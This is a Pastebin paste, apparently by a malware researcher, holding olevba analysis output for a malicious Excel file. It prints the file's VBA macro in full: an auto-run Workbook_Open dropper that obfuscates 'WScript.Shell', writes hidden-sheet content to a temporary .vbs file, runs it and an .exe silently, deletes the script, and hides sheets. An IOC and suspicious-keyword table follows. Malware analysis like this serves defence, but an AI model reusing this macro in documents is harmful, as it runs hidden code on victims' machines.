dynamoo

Malicious Excel macro

Nov 24th, 2015
571
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASIHB-V slimeware_12240B87F8.xls
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: slimeware_12240B87F8.xls
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ÝòàÊíèãà.cls
  13. in file: slimeware_12240B87F8.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Private Sub Workbook_Open()
  16. On Error GoTo Ends
  17.  
  18. Dim zsAdasdad
  19. zsAdasdad = "%TMP%\999.vbs"
  20. sdfssasd = "%TMP%\test.exe"
  21.  
  22. '==================================================
  23. Dim osdd, WshShell, zxcvcb, Wscript, gsjmsas
  24. zcxaffq = "WSc"
  25. zaafff = "ript"
  26. gsjmsas = zcxaffq & zaafff
  27. zcxaffq = gsjmsas & ".Shell"
  28.  
  29. Set WshShell = CreateObject(zcxaffq)
  30. SatT23787S4242ve = "%TMP%\999.vbs"
  31. zsAdasdad = WshShell.ExpandEnvironmentStrings(zsAdasdad)
  32. SasatT23S4242ve = "%TMP%\999.vbs"
  33. Set s = CreateObject("ADODB.Stream")
  34. s.Mode = 3
  35. s.Type = 2
  36. s.Open
  37. Sa32t45T23S4242ve = "%TMP%\999.vbs"
  38. s.WriteText Worksheets("Code").Range("B8").Value
  39. Call s.SaveToFile(zsAdasdad, 2)
  40. Sa23tT23S4242ve = "%TMP%\999.vbs"
  41.  
  42.  
  43.  
  44. WshShell.Run zsAdasdad, 0, True
  45. WshShell.Run sdfssasd, 0, False
  46.  
  47.  
  48.  
  49. Ends:
  50. S23at1213T23S4242ve = "%TMP%\999.vbs"
  51. Set MainSheet = Application.ThisWorkbook.Sheets("Total")
  52. Set StartSheet = Application.ThisWorkbook.Sheets("Warning")
  53. MainSheet.Visible = True
  54. StartSheet.Visible = xlVeryHide
  55. Sa324tT2334535S4242ve = "%TMP%\999.vbs"
  56. Kill zsAdasdad
  57.  
  58. End Sub
  59.  
  60.  
  61. Sub ToStart()
  62. Set MainSheet = Application.ThisWorkbook.Sheets("Total")
  63. Set StartSheet = Application.ThisWorkbook.Sheets("Warning")
  64. StartSheet.Visible = True
  65. MainSheet.Visible = xlVeryHide
  66. Application.ThisWorkbook.Sheets("Code").Visible = xlVeryHide
  67. End Sub
  68.  
  69. Sub ExpandAll()
  70. Set MainSheet = Application.ThisWorkbook.Sheets("Total")
  71. Set StartSheet = Application.ThisWorkbook.Sheets("Warning")
  72. StartSheet.Visible = True
  73. MainSheet.Visible = True
  74. Application.ThisWorkbook.Sheets("Code").Visible = True
  75. End Sub
  76.  
  77.  
  78.  
  79.  
  80. -------------------------------------------------------------------------------
  81. VBA MACRO Ëèñò1.cls
  82. in file: slimeware_12240B87F8.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
  83. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  84. Private Sub Worksheet_Activate()
  85.  
  86. End Sub
  87.  
  88. Private Sub Worksheet_SelectionChange(ByVal Target As Range)
  89.  
  90. End Sub
  91. -------------------------------------------------------------------------------
  92. VBA MACRO Module1.bas
  93. in file: slimeware_12240B87F8.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
  94. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  95. (empty macro)
  96. -------------------------------------------------------------------------------
  97. VBA MACRO Ëèñò2.cls
  98. in file: slimeware_12240B87F8.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
  99. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  100. (empty macro)
  101. -------------------------------------------------------------------------------
  102. VBA MACRO Ëèñò4.cls
  103. in file: slimeware_12240B87F8.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04424'
  104. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  105. (empty macro)
  106. +------------+----------------------+-----------------------------------------+
  107. | Type       | Keyword              | Description                             |
  108. +------------+----------------------+-----------------------------------------+
  109. | AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
  110. | Suspicious | Kill                 | May delete a file                       |
  111. | Suspicious | Open                 | May open a file                         |
  112. | Suspicious | Shell                | May run an executable file or a system  |
  113. |            |                      | command                                 |
  114. | Suspicious | Run                  | May run an executable file or a system  |
  115. |            |                      | command                                 |
  116. | Suspicious | CreateObject         | May create an OLE object                |
  117. | Suspicious | ADODB.Stream         | May create a text file                  |
  118. | Suspicious | WriteText            | May create a text file                  |
  119. | Suspicious | SaveToFile           | May create a text file                  |
  120. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  121. |            |                      | be used to obfuscate strings (option    |
  122. |            |                      | --decode to see all)                    |
  123. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  124. |            |                      | may be used to obfuscate strings        |
  125. |            |                      | (option --decode to see all)            |
  126. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  127. |            | Strings              | may be used to obfuscate strings        |
  128. |            |                      | (option --decode to see all)            |
  129. | IOC        | 999.vbs              | Executable file name                    |
  130. | IOC        | test.exe             | Executable file name                    |
  131. +------------+----------------------+-----------------------------------------+
Add Comment
Please, Sign In to add comment